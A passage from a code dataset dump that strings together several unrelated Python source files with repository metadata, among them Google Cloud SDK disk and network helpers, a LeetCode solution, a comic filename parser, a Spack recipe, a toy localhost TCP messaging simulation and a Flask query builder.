if support_network_tier:\n network_tier = interface.get('network-tier',\n constants.DEFAULT_NETWORK_TIER)\n else:\n network_tier = None\n\n result.append(CreateNetworkInterfaceMessage(\n resources, compute_client, interface.get('network', None),\n interface.get('subnet', None),\n interface.get('private-network-ip', None), no_address,\n address, instance_refs, interface.get('aliases', None), network_tier))\n return result\n\n\ndef ParseDiskResource(resources, name, project, zone, type_):\n if type_ == compute_scopes.ScopeEnum.REGION:\n return resources.Parse(\n name,\n collection='compute.regionDisks',\n params={\n 'project': project,\n 'region': utils.ZoneNameToRegionName(zone)\n })\n else:\n return resources.Parse(\n name,\n collection='compute.disks',\n params={\n 'project': project,\n 'zone': zone\n })\n\n\ndef CreatePersistentAttachedDiskMessages(\n resources, compute_client, csek_keys, disks, instance_ref):\n \"\"\"Returns a list of AttachedDisk messages and the boot disk's reference.\"\"\"\n disks_messages = []\n boot_disk_ref = None\n\n messages = compute_client.messages\n compute = compute_client.apitools_client\n for disk in disks:\n name = disk['name']\n\n # Resolves the mode.\n mode_value = disk.get('mode', 'rw')\n if mode_value == 'rw':\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE\n else:\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_ONLY\n\n boot = disk.get('boot') == 'yes'\n auto_delete = disk.get('auto-delete') == 'yes'\n\n if 'scope' in disk and disk['scope'] == 'regional':\n scope = compute_scopes.ScopeEnum.REGION\n else:\n scope = compute_scopes.ScopeEnum.ZONE\n disk_ref = ParseDiskResource(resources, name, instance_ref.project,\n instance_ref.zone, scope)\n\n if boot:\n boot_disk_ref = disk_ref\n\n # TODO(b/36051031) drop test after CSEK goes GA\n if csek_keys:\n disk_key_or_none = csek_utils.MaybeLookupKeyMessage(\n csek_keys, disk_ref, compute)\n kwargs = {'diskEncryptionKey': disk_key_or_none}\n else:\n kwargs = {}\n\n attached_disk = messages.AttachedDisk(\n autoDelete=auto_delete,\n boot=boot,\n deviceName=disk.get('device-name'),\n mode=mode,\n source=disk_ref.SelfLink(),\n type=messages.AttachedDisk.TypeValueValuesEnum.PERSISTENT,\n **kwargs)\n\n # The boot disk must end up at index 0.\n if boot:\n disks_messages = [attached_disk] + disks_messages\n else:\n disks_messages.append(attached_disk)\n\n return disks_messages, boot_disk_ref\n\n\ndef CreatePersistentCreateDiskMessages(compute_client,\n resources, csek_keys, create_disks,\n instance_ref):\n \"\"\"Returns a list of AttachedDisk messages for newly creating disks.\n\n Args:\n compute_client: creates resources,\n resources: parser of resources,\n csek_keys: customer suplied encryption keys,\n create_disks: disk objects - contains following properties\n * name - the name of disk,\n * mode - 'rw' (R/W), 'ro' (R/O) access mode,\n * disk-size - the size of the disk,\n * disk-type - the type of the disk (HDD or SSD),\n * image - the name of the image to initialize from,\n * image-family - the image family name,\n * image-project - the project name that has the image,\n * auto-delete - whether disks is deleted when VM is deleted,\n * device-name - device name on VM.\n instance_ref: reference to the instance that will own the new disks.\n Returns:\n list of API messages for attached disks\n \"\"\"\n disks_messages = []\n\n messages = compute_client.messages\n compute = compute_client.apitools_client\n for disk in create_disks or []:\n name = disk.get('name')\n\n # Resolves the mode.\n mode_value = disk.get('mode', 'rw')\n if mode_value == 'rw':\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE\n else:\n mode = messages.AttachedDisk.ModeValueValuesEnum.READ_ONLY\n\n auto_delete_value = disk.get('auto-delete', 'yes')\n auto_delete = auto_delete_value == 'yes'\n\n disk_size_gb = utils.BytesToGb(disk.get('size'))\n disk_type = disk.get('type')\n if disk_type:\n disk_type_ref = resources.Parse(disk_type,\n collection='compute.diskTypes',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n })\n\n disk_type_uri = disk_type_ref.SelfLink()\n else:\n disk_type_ref = None\n disk_type_uri = None\n\n image_expander = image_utils.ImageExpander(compute_client,\n resources)\n image_uri, _ = image_expander.ExpandImageFlag(\n user_project=instance_ref.project,\n image=disk.get('image'),\n image_family=disk.get('image-family'),\n image_project=disk.get('image-project'),\n return_image_resource=False)\n\n image_key = None\n disk_key = None\n if csek_keys:\n image_key = csek_utils.MaybeLookupKeyMessagesByUri(csek_keys,\n resources,\n [image_uri],\n compute)\n if name:\n disk_ref = resources.Parse(name,\n collection='compute.disks',\n params={'zone': instance_ref.zone})\n disk_key = csek_utils.MaybeLookupKeyMessage(csek_keys, disk_ref,\n compute)\n\n create_disk = messages.AttachedDisk(\n autoDelete=auto_delete,\n boot=False,\n deviceName=disk.get('device-name'),\n initializeParams=messages.AttachedDiskInitializeParams(\n diskName=name,\n sourceImage=image_uri,\n diskSizeGb=disk_size_gb,\n diskType=disk_type_uri,\n sourceImageEncryptionKey=image_key),\n mode=mode,\n type=messages.AttachedDisk.TypeValueValuesEnum.PERSISTENT,\n diskEncryptionKey=disk_key)\n\n disks_messages.append(create_disk)\n\n return disks_messages\n\n\ndef CreateAcceleratorConfigMessages(msgs, accelerator_type_ref,\n accelerator_count):\n \"\"\"Returns a list of accelerator config messages.\n\n Args:\n msgs: tracked GCE API messages.\n accelerator_type_ref: reference to the accelerator type.\n accelerator_count: number of accelerators to attach to the VM.\n\n Returns:\n a list of accelerator config message that specifies the type and number of\n accelerators to attach to an instance.\n \"\"\"\n\n accelerator_config = msgs.AcceleratorConfig(\n acceleratorType=accelerator_type_ref.SelfLink(),\n acceleratorCount=accelerator_count)\n return [accelerator_config]\n\n\ndef CreateDefaultBootAttachedDiskMessage(\n compute_client, resources, disk_type, disk_device_name, disk_auto_delete,\n disk_size_gb, require_csek_key_create, image_uri, instance_ref,\n csek_keys=None):\n \"\"\"Returns an AttachedDisk message for creating a new boot disk.\"\"\"\n messages = compute_client.messages\n compute = compute_client.apitools_client\n\n if disk_type:\n disk_type_ref = resources.Parse(\n disk_type,\n collection='compute.diskTypes',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n })\n disk_type_uri = disk_type_ref.SelfLink()\n else:\n disk_type_ref = None\n disk_type_uri = None\n\n if csek_keys:\n # If we're going to encrypt the boot disk make sure that we select\n # a name predictably, instead of letting the API deal with name\n # conflicts automatically.\n #\n # Note that when csek keys are being used we *always* want force this\n # even if we don't have any encryption key for default disk name.\n #\n # Consider the case where the user's key file has a key for disk `foo-1`\n # and no other disk. Assume she runs\n # gcloud compute instances create foo --csek-key-file f \\\n # --no-require-csek-key-create\n # and gcloud doesn't force the disk name to be `foo`. The API might\n # select name `foo-1` for the new disk, but has no way of knowing\n # that the user has a key file mapping for that disk name. That\n # behavior violates the principle of least surprise.\n #\n # Instead it's better for gcloud to force a specific disk name in the\n # instance create, and fail if that name isn't available.\n\n effective_boot_disk_name = (\n disk_device_name or instance_ref.Name())\n\n disk_ref = resources.Parse(effective_boot_disk_name,\n collection='compute.disks',\n params={\n 'project': instance_ref.project,\n 'zone': instance_ref.zone\n })\n disk_key_or_none = csek_utils.MaybeToMessage(\n csek_keys.LookupKey(disk_ref, require_csek_key_create),\n compute)\n [image_key_or_none] = csek_utils.MaybeLookupKeyMessagesByUri(\n csek_keys, resources, [image_uri], compute)\n kwargs_init_parms = {'sourceImageEncryptionKey': image_key_or_none}\n kwargs_disk = {'diskEncryptionKey': disk_key_or_none}\n else:\n kwargs_disk = {}\n kwargs_init_parms = {}\n effective_boot_disk_name = disk_device_name\n\n return messages.AttachedDisk(\n autoDelete=disk_auto_delete,\n boot=True,\n deviceName=effective_boot_disk_name,\n initializeParams=messages.AttachedDiskInitializeParams(\n sourceImage=image_uri,\n diskSizeGb=disk_size_gb,\n diskType=disk_type_uri,\n **kwargs_init_parms),\n mode=messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE,\n type=messages.AttachedDisk.TypeValueValuesEnum.PERSISTENT,\n **kwargs_disk)\n\n\ndef UseExistingBootDisk(disks):\n \"\"\"Returns True if the user has specified an existing boot disk.\"\"\"\n return any(disk.get('boot') == 'yes' for disk in disks)\n\n\ndef CreateLocalSsdMessage(resources, messages, device_name, interface,\n size_bytes=None, zone=None, project=None):\n \"\"\"Create a message representing a local ssd.\"\"\"\n\n if zone:\n disk_type_ref = resources.Parse(\n 'local-ssd',\n collection='compute.diskTypes',\n params={\n 'project': project,\n 'zone': zone\n }\n )\n disk_type = disk_type_ref.SelfLink()\n else:\n disk_type = 'local-ssd'\n\n maybe_interface_enum = (\n messages.AttachedDisk.InterfaceValueValuesEnum(interface)\n if interface else None)\n\n local_ssd = messages.AttachedDisk(\n type=messages.AttachedDisk.TypeValueValuesEnum.SCRATCH,\n autoDelete=True,\n deviceName=device_name,\n interface=maybe_interface_enum,\n mode=messages.AttachedDisk.ModeValueValuesEnum.READ_WRITE,\n initializeParams=messages.AttachedDiskInitializeParams(\n diskType=disk_type),\n )\n\n if size_bytes is not None:\n local_ssd.diskSizeGb = utils.BytesToGb(size_bytes)\n\n return local_ssd\n","repo_name":"springml/case_routing","sub_path":"google-cloud-sdk/lib/googlecloudsdk/api_lib/compute/instance_utils.py","file_name":"instance_utils.py","file_ext":"py","file_size_in_byte":26294,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"73"} +{"seq_id":"4323130439","text":"class Solution:\n def minSwapsCouples(self, row: List[int]) -> int:\n pos = {x:i for i,x in enumerate(row)}\n ans = 0\n for i in range(0,len(row),2):\n x = row[i]\n if row[i+1] != (x^1):\n y = x^1\n j = pos[y]\n row[i+1],row[j] = row[j],row[i+1]\n pos[row[j]] = j\n pos[row[i+1]] = i+1\n ans += 1\n return ans","repo_name":"chadexplains/leetcode","sub_path":"765/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33940463529","text":"from django.apps import apps\nfrom django.test import TestCase\n\nfrom tables.models import ModelSchema\nfrom tables.constants import TABLE_APP_LABEL\n\n\nDEFAULT_DYNAMIC_MODELS_SET = {'modelschema', 'fieldschema'}\n\n\ndef all_dynamic_models_loaded() -> set[str]:\n return set(apps.all_models[TABLE_APP_LABEL].keys())\n\n\nclass TestCaseDynamicModels(TestCase):\n def setUp(self) -> None:\n super().setUp()\n # sanity check, no dynamic model leaked during tests\n self.assertEqual(\n all_dynamic_models_loaded(),\n DEFAULT_DYNAMIC_MODELS_SET\n )\n\n def tearDown(self) -> None:\n super().tearDown()\n for schema in ModelSchema.objects.all():\n schema.delete()\n\n # sanity check, all dynamic model should be now unregistered\n self.assertEqual(\n all_dynamic_models_loaded(),\n DEFAULT_DYNAMIC_MODELS_SET\n )\n","repo_name":"knrd/dynamic-tables","sub_path":"tables/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"10749631979","text":"'''\r\nThis is a modified version of cbanack's fnamparser module from his\r\nComicVineScraper plugin (https://github.com/cbanack/comic-vine-scraper)\r\n\r\nThis module contains functions for extracting and parsing details out\r\nof comic book filenames.\r\n\r\nCreated on Oct 23, 2011\r\n@author: cbanack\r\n\r\nOriginally modified on Aug 10, 2016\r\n@author: hmhrex\r\n'''\r\nimport re,os\r\nfrom . import utils\r\n\r\n\r\n#==============================================================================\r\ndef extract( filename_s ):\r\n '''\r\n Takes the filename of a comic book, and extracts three strings out of it: the\r\n series name, the issue number, and the issue year. These three pieces\r\n of information are returned as a triple, i.e. (\"batman\", \"344\", \"2004\").\r\n\r\n This function never returns None, and it will ALWAYS return the triple with\r\n at least a non-empty series name (even if it is just \"unknown\"), but the\r\n issue number and year may be \"\" if they couldn't be determined.\r\n '''\r\n # remove the file extension, unless it's the whole filename\r\n name_s = os.path.basename(filename_s)\r\n last_period = name_s.rfind(r\".\")\r\n name_s = name_s if last_period <= 0 else name_s[0:last_period]\r\n\r\n # see if the comic matches the following format, and if so, remove everything\r\n # after the first number:\r\n # \"nnn series name #xx (etc) (etc)\" -> \"series name #xx (etc) (etc)\"\r\n match = re.match(r\"^\\s*(\\d+)[\\s._-]+\" + # \"nnn\"\r\n r\"([^#]+?\" + # \"series name\"\r\n r\"#-?\\d+.*)\", name_s) # \"#xx (etc) (etc)\"\r\n if match: name_s = match.group(2)\r\n\r\n # see if the comic matches the following format, and if so, remove everything\r\n # after the first number that isn't in brackets:\r\n # \"series name #xxx - title (etc) (etc)\" -> \"series name #xxx (ect) (etc)\r\n match = re.match(r\"^((?:[a-zA-Z,.-]+\\s+)+\" + # \"series name\"\r\n r\"#?(?:\\d+[.0-9]*))\\s*(?:-)\" + # \"#xxx -\"\r\n r\".*?((\\(.*)?)$\", name_s) # \"title (etc) (etc)\"\r\n\r\n # TOCHANGE: log.debug()\r\n if match:\r\n #log.debug(name_s)\r\n name_s = match.group(1) + \" \" + match.group(2)\r\n #log.debug(\" -> \", name_s)\r\n\r\n # try the extraction. if anything goes wrong, or if we come up with a blank\r\n # series name, revert to the filename (without extension) as series name\r\n try:\r\n retval = __extract(name_s)\r\n if retval[0].strip() == \"\":\r\n raise Exception(\"parsed blank series name\")\r\n\r\n # TOCHANGE: log.debug()\r\n except:\r\n #log.debug_exc(\"Recoverable error extracting from '\" + name_s + \"':\")\r\n retval = name_s, \"\", \"\"\r\n return retval\r\n\r\n\r\n\r\n#==============================================================================\r\ndef __extract(name_s):\r\n ''' Internal implementation of the similarly named method in this package '''\r\n\r\n # 1. 's' is the name of our 'working' series name. we'll slowly strip the\r\n # 'non-series name' data out of it, til what's left is the series name\r\n s = name_s\r\n\r\n # 2. but first, see if there's a volume/year in there.\r\n volume_year_s = __extract_year(s)\r\n\r\n # 3. strip out all bracketed data from the name\r\n def recurse_sub(pattern, s):\r\n while re.search(pattern, s):\r\n s = re.sub(pattern, \"\", s)\r\n return s\r\n s = recurse_sub(r\"\\([^\\(]*?\\)\", s)\r\n s = recurse_sub(r\"\\{[^\\{]*?\\}\", s)\r\n s = recurse_sub(r\"\\[[^\\[]*?\\]\", s)\r\n\r\n # 4. clean out underscores\r\n s = re.sub(r\"_\", \" \", s)\r\n\r\n # 5. remove all trace of volume from the name (like \"vol. 2a\" and \"vol -3.1\")\r\n s = re.sub(r\"(?i)(\\b((vol)\\.?|volume))\", \"\", s)\r\n\r\n # 6. remove all page counts, ie. \"245p\" or \"50 pages\"\r\n s = re.sub(r\"(?i)\\b[.,]?\\s*\\d+\\s*(p|pg|pgs|pages)\\b[.,]?\", \"\", s)\r\n\r\n # 7. remove anything following a similar pattern to \"02 of 02 covers\"\r\n s = re.sub(r\"(?i)(\\d+\\s*of\\s*\\d+\\s*covers)\", \"\", s)\r\n\r\n # 8. if the name has things like \"4 of 5\", remove the \" of 5\" part\r\n # also, if the name has 3-6, remove the -6 part. note that we'll\r\n # try to handle the word \"of\" in a few common languages, like french/\r\n # spanish (de), italian (di), german (von), dutch (van) or polish (z)\r\n s = re.sub(r\"(?i)(?<=\\d)(\\s*(of|de|di|von|van|z)\\s*#*\\d+)\", \"\", s)\r\n s = re.sub(r\"(?<=\\d)(-\\d+)\", \"\", s)\r\n\r\n # 9. if this is one of those comic books that replaces all spaces with\r\n # dashes or periods, then strip the dashes and/or periods out. otherwise\r\n # leave them in (because they might be important, like minus signs or\r\n # something.)\r\n if \"-\" in s and \" \" not in s:\r\n s = re.sub(r\"(? 1 and re.match(pattern,s):\r\n s = re.sub(pattern, \"\", s, 1)\r\n matches = __extract_numbers(s)\r\n\r\n # 12. if we parsed out some potential issue numbers, designate the LAST\r\n # (rightmost) one as the actual issue number, and remove it from the name\r\n if len(matches) > 0:\r\n issue_num_s = matches[-1].group(2)\r\n series_s = s[:matches[-1].start(0)] +s[matches[-1].end(0):]\r\n # 10a. strip off leading/trailing zeroes\r\n matches = re.match(\"^(0+)([0-9].*)$\", issue_num_s)\r\n issue_num_s = matches.group(2) if matches else issue_num_s\r\n\r\n #TOCHANGE: utils.is_number() and utils.sstr()\r\n if re.match(\"^-?[.0-9]+$\", issue_num_s) and utils.is_number(issue_num_s):\r\n issue_num_s = utils.sstr(float(issue_num_s) \\\r\n if '.' in issue_num_s else int(issue_num_s))\r\n else:\r\n issue_num_s = \"\"\r\n series_s = s\r\n\r\n # 13. contract repeating whitespace, and strip bad chars off the ends\r\n series_s = re.sub(r\"\\s{2,}\", \" \", series_s).strip(\" ,-_\")\r\n\r\n return [series_s, issue_num_s, volume_year_s]\r\n\r\n\r\n#==============================================================================\r\ndef __extract_year(s):\r\n '''\r\n Searches through the given string left-to-right, seeing if an intelligible\r\n publication year can be extracted. if it can, it will be returned as a\r\n four digit string, otherwise \"\" will be returned.\r\n '''\r\n\r\n retval = \"\"\r\n\r\n # type one years appear exactly as \"V2003\". there's a popular comicrack\r\n # script that creates dates that look like this, so parse em if we can\r\n results = [ x[1] for x in\r\n re.findall(r\"(?i)(^|[, -_])v(\\d{4})($|[, -_])\",s) if __isYear(x[1]) ]\r\n\r\n if len(results) == 1:\r\n retval = results[0]\r\n else:\r\n # roughly, we're looking for a year or year range inside brackets\r\n # so: [2003], (2004-6), {2000-2010}, etc.\r\n\r\n # 1. get everything substring is strictly inside only one set of brackets\r\n results = re.findall(r\"\\([^[\\](){}]*?\\)\",s)\r\n results += re.findall(r\"\\[[^[\\](){}]*?\\]\",s)\r\n results += re.findall(r\"\\{[^[\\](){}]*?\\}\",s)\r\n # 2. strip off the outer brackets and spaces\r\n results = [x.strip(r\"()[]{}\").strip() for x in results]\r\n # 3. if there is a year range, strip of the second half \"2006-2009\" -> \"2006\"\r\n results = [re.sub(r\"(\\d{4})\\s*-\\s*\\d{1,4}\",r\"\\1\",x) for x in results]\r\n # 4. only keep strings that are valid 4 digit years\r\n results = [x for x in results if __isYear(x)]\r\n retval = results[-1] if results else \"\"\r\n\r\n return retval\r\n\r\n\r\n#==============================================================================\r\ndef __extract_numbers(s):\r\n '''\r\n Searches through the given string left-to-right, building an ordered list of\r\n \"issue number-like\" re.match objects. For example, this method finds\r\n matches substrings like: 3, #4, 6.00, .5, -1.0\r\n '''\r\n matches = list(re.finditer(r\"(?u)(^|[_\\s#v])(-?\\d*\\.?\\d)\", s))\r\n # remove matches that look like years, EXCEPT on the \"2000AD\" series,\r\n # the \"The Beano\" series, and any year that starts with '#' (i.e. #1950)\r\n is2000AD = re.match(r\"(?i)\\s*2000[\\s\\.-_]*a[\\s.-_]*d.*\", s)\r\n isBeano = re.match(r\"(?i)\\s*the[\\s\\.-_]+beano[\\s.-_]+#?\\d{4}\", s)\r\n if not is2000AD and not isBeano:\r\n matches = [x for x in matches if not __isYear(x.group(2)) or\r\n (x.start(2) > 0 and s[x.start(2)-1] == '#') ]\r\n return matches\r\n\r\n\r\n#==============================================================================\r\ndef __isYear(d):\r\n ''' Returns true iff the give stream appears to be a valid 4 digit year. '''\r\n return re.match(r\"^\\d{4}$\",d) and int(d) > 1900 and int(d) < 2100\r\n","repo_name":"Tenma-Server/Tenma","sub_path":"comics/utils/fnameparser.py","file_name":"fnameparser.py","file_ext":"py","file_size_in_byte":8891,"program_lang":"python","lang":"en","doc_type":"code","stars":248,"dataset":"github-code","pt":"73"} +{"seq_id":"678753567","text":"# -*- coding: utf-8 -*-\n__author__ = 'qingxuan'\n\nimport numpy as np\n\nfrom eg_common import LibC\nfrom fake_redis import newOrCreateConnection\n\n\n\"\"\"\nThe logic module for example\n\"\"\"\nclass VaPowerLogic(object):\n def __init__(self, redis_name=\"0\", io_name =(\"VaPowerLogic\", \"mic_chunk\", \"mic_power\")):\n self.redis = newOrCreateConnection(redis_name)\n self.io_name = io_name\n self.redis.subscribe(self.io_name[1], self.io_name[0], self.mic_chunk)\n self.data_block = []\n\n def mic_chunk(self, data):\n self.data_block.append(data)\n if len(self.data_block) >= 2:\n dt2 = self.data_block\n self.data_block = []\n LibC.rc_pool.run(self.in_data0, dt2)\n\n def in_data0(self, chunks):\n ck2 = b''.join(chunks)\n ck3 = np.fromstring(ck2, dtype=np.int16)\n ck4 = ck3.astype(np.float32)\n ck5 = ck4 ** 2\n ck6 = np.average(ck5)\n ck7 = ck6 / 1000000000.0\n if ck7 > 1:\n ck7 = 1\n # print(ck7)\n self.redis.publish(self.io_name[2], ck7)\n","repo_name":"QingxuanYang/py_example_audio_flower","sub_path":"code/eg_logic.py","file_name":"eg_logic.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1916207364","text":"from spack.package import *\n\n\nclass PySphinxcontribIssuetracker(PythonPackage):\n \"\"\"Sphinx integration with different issuetrackers.\"\"\"\n\n homepage = \"https://sphinxcontrib-issuetracker.readthedocs.org/\"\n pypi = \"sphinxcontrib-issuetracker/sphinxcontrib-issuetracker-0.11.tar.gz\"\n\n version(\"0.11\", sha256=\"843753d8b5e989116378ab45ecccb368fb78dc56eaa1554ed25e4fbf22745f4e\")\n\n depends_on(\"py-setuptools\", type=\"build\")\n depends_on(\"py-sphinx@1.1:\", type=(\"build\", \"run\"))\n depends_on(\"py-requests@1.1:\", type=(\"build\", \"run\"))\n","repo_name":"spack/spack","sub_path":"var/spack/repos/builtin/packages/py-sphinxcontrib-issuetracker/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"22369103199","text":"# Python program to implement server side of chat room.\r\n\r\nimport socket\r\nimport select\r\nimport sys\r\n\r\nimport threading\r\nimport _thread\r\nimport pickle\r\nfrom minCalc import *\r\n\r\n\"\"\"The first argument AF_INET is the address domain of the\r\nsocket. This is used when we have an Internet Domain with\r\nany two hosts The second argument is the type of socket.\r\nSOCK_STREAM means that data or characters are read in\r\na continuous flow.\"\"\"\r\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n\r\n# takes the first argument from command prompt as IP address\r\nIP_address = 'localhost'\r\n\r\n# takes second argument from command prompt as port number\r\nPort = 8088\r\nsource = \"H\"\r\nprint(source)\r\n\r\n\"\"\"\r\nbinds the server to an entered IP address and at the\r\nspecified port number.\r\nThe client must be aware of these parameters\r\n\"\"\"\r\nserver.bind((IP_address, Port))\r\n\r\n\"\"\"\r\nlistens for 100 active connections. This number can be\r\nincreased as per convenience.\r\n\"\"\"\r\nserver.listen(100)\r\n\r\ndef connectJANthread():\r\n while True:\r\n try:\r\n #s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n toJan.connect((\"localhost\", int(\"100\")))\r\n\r\n print(\"Jan is connected\")\r\n\r\n except:\r\n continue\r\n\r\ndef conthread(conn, addr):\r\n #\r\n flagCodeWait = 0\r\n while True:\r\n try:\r\n\r\n pack = []\r\n\r\n # print(\"here\")\r\n i = 0\r\n while i == 0:\r\n # what are you? router or man or is it you chan?\r\n pack = conn.recv(1024)\r\n i = 1\r\n gainPack = pickle.loads(pack)\r\n print(gainPack)\r\n send_to = gainPack[1]\r\n gainMessage = gainPack[2]\r\n \r\n if send_to == 'H' :\r\n if gainMessage == 'PEPPER THE PEPPER':\r\n try:\r\n pack = []\r\n pack.append(\"Air Force HQ\")\r\n pack.append(\"jan\")\r\n pack.append(\"Give Coordinates\")\r\n sendPack = pickle.dumps(pack)\r\n flagCodeWait = 1\r\n i = 0\r\n while i == 0:\r\n\r\n toJan.send(bytes(sendPack))\r\n i = 1\r\n\r\n\r\n except:\r\n print(\"Jan does not exists\")\r\n elif flagCodeWait == 1:\r\n pack = []\r\n pack.append(\"Air Force HQ\")\r\n pack.append(\"jan\")\r\n pack.append(\"CONGRATULATIONS WE FRIED DRY GREEN LEAVES\")\r\n sendPack = pickle.dumps(pack)\r\n flagCodeWait = 1\r\n i = 0\r\n while i == 0:\r\n toJan.send(bytes(sendPack))\r\n i = 1\r\n else:\r\n print(\"\")\r\n\r\n except:\r\n print(addr, \"disconnected\")\r\n break\r\n # continue\r\n\r\n\r\ntoJan = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n_thread.start_new_thread(connectJANthread, ())\r\n\r\nwhile True:\r\n \"\"\"Accepts a connection request and stores two parameters, \r\n conn which is a socket object for that user, and addr \r\n which contains the IP address of the client that just \r\n connected\"\"\"\r\n\r\n conn, addr = server.accept()\r\n print(\"Connection Address(ip, port):\" + str(addr))\r\n\r\n\r\n _thread.start_new_thread(conthread, (conn, addr))\r\n\r\n\r\nconn.close()\r\nserver.close()\r\n","repo_name":"CuriousPonder/TCP_Messaging_Simulation","sub_path":"TCP_Simulation/routerH.py","file_name":"routerH.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"628014789","text":"# Define variable to hold sum of multiples of 3 and 5\nsumMultiples = 0\n\n# Iterate from 1 to 999\nfor i in range(1, 1000):\n \n # If i is divisible by 3 or 5, add it to the sum of multiples\n if i % 3 == 0 or i % 5 == 0:\n sumMultiples += i\n \n # Otherwise... don't\n else:\n continue\n\n# Print the result\nprint(sumMultiples)\n","repo_name":"zantelope/01ProjectEuler","sub_path":"bruteForce.py","file_name":"bruteForce.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"10451545009","text":"from collections import deque\n\nfrom flask import current_app, request, session\nfrom flask_login import current_user\nfrom sqlalchemy import exc\n\nfrom powernap.exceptions import InvalidFormError\nfrom powernap.helpers import load_from_string, model_attrs\nfrom powernap.query.columns import BaseQueryColumn, QUERY_COLUMNS\n\n\ndef construct_query(cls, enforce_owner=True, **kwargs):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from kwargs.\n\n :param cls: Target SQLA model for query_construction.\n :param enforce_owner: Ensures `id` in the query is set to\n the `current_user`'s id.\n :param kwargs: Kwargs to overide the query_args passed to\n :meth:`.QueryTransformer.transform`.\n \"\"\"\n query_args = get_query_args_for_cls(\n cls, enforce_owner=enforce_owner, **kwargs)\n return QueryTransformer(cls).transform(query_args)\n\n\ndef extend_query(query, enforce_owner=True, ignore=[], **kwargs):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from kwargs.\n\n :param query: A query on an object.\n :param enforce_owner: Ensures `id` in the query is set to\n the `current_user`'s id.\n :param ignore: Parameters to ignore from the query_args.\n :param kwargs: Kwargs to overide the query_args passed to\n :meth:`.QueryTransformer.transform`.\n\n This method is for using `construct_query`like functionality to extend\n an existing query, like for objects that require complex queries to be\n constructed intitially.\n \"\"\"\n cls = query._primary_entity.type\n query_args = get_query_args_for_cls(\n cls, enforce_owner=enforce_owner, **kwargs)\n for arg in ignore:\n query_args.pop(arg)\n return QueryTransformer(cls, query=query).transform(query_args)\n\n\ndef get_query_args_for_cls(cls, enforce_owner=True, **kwargs):\n \"\"\"Get the queryargs from the request and override them where needed.\n\n :param kwargs: kwargs to override the query args with.\n :param enforce_owner: Ensures `id` in the query is set to\n the `current_user`'s id.\n\n This function serves as the primary means of ensuring query\n construction is done using only the current_user's id,\n and in cases of admin's to prevent confirm_owner from raising errors.\n \"\"\"\n args = request.args.to_dict()\n args.update(kwargs)\n return override_owner_id(cls, args) if enforce_owner else args\n\n\ndef override_owner_id(cls, query_args):\n \"\"\"Used to ensure that users cannot query other users data.\"\"\"\n user_attr, db_attr = model_attrs()\n if not getattr(current_user, 'is_admin', False) and hasattr(cls, db_attr) \\\n and hasattr(current_user, user_attr):\n query_args[db_attr] = getattr(current_user, user_attr)\n return query_args\n\n\nclass QueryTransformer:\n query_columns = QUERY_COLUMNS\n\n def __init__(self, cls=None, query=None):\n self.cls = cls or query._primary_entity.type\n self.initial_query = query\n self.exclude_properties = []\n self.page = current_app.config['PAGINATION_PAGE']\n self.per_page = current_app.config['PAGINATION_PER_PAGE']\n self.pagination = (self.page, self.per_page)\n\n def transform(self, query_args):\n \"\"\"Return :class:`flask_sqlalchemy.Pagination` object from kwargs.\n\n :param query_args: A dictionary of values SQLA Alchemy will use to\n construct the query, where the key is the function/field name\n and the value is the value to pass to the function/field.\n It can contain 4 different types of items:\n\n 1. Keys accepted by :meth:`db.session.query.filter_by`.\n\n `kwargs = {'first': 'John', 'last': 'BeGood'}`\n `self.cls.query.filter_by(first='John', last='BeGood')`\n\n 2. Keys that are methods on `db.session.query`.\n\n (Theses keys must start with a `$` to designate they are\n not kwargs to pass to `filter_by`)\n\n `kwargs = {'$order_by': 'first'}`\n `self.cls.query.order_by('first')`\n\n 3. Keys that require a definition of a special method.\n These methods are defined in :module:`..methods`.\n\n (Key must be in the format `column__method`. These keys\n do not need `$` because the `__` identifies them as a\n non-field value.\n\n `kwargs = {'subject__icontains': 'hello'}`\n `..methods.icontains(*args)`\n\n 4. Keys equal to `self.page` and `self.per_page`.\n\n (Theses keys must start with a `$` to designate they are\n not kwargs to pass to `filter_by`)\n\n `kwargs = {'page': 2, 'per_page': 25}`\n `self.cls.query.paginate(2, 25, False)`\n\n If a kwarg not passed to `filter_by` is invalid the exception is\n caught & the query continues executing. If a kwarg not designated\n special, is not a pagination kwarg, & is an invalid field will raise\n a subclassed :class:`core.api.exceptions.ApiError`.\n \"\"\"\n self.pop_exclude_kwargs(query_args)\n paginate = self.pop_pagination_kwargs(query_args)\n query = self.create_query(query_args)\n return self.paginate_query(query, paginate)\n\n def create_query(self, kwargs):\n \"\"\"Create the query. Called by :meth:`.QueryTransformer.transform`.\"\"\"\n impl_data = self.prep_for_impl(kwargs)\n query = self.initial_query if self.initial_query else self.cls.query\n for value_tuple in impl_data:\n query = self.implement(query, value_tuple)\n return query\n\n def prep_for_impl(self, kwargs):\n \"\"\"Return list of tuples for each column.\n\n Appends tuples for filter_by to the beggining of the 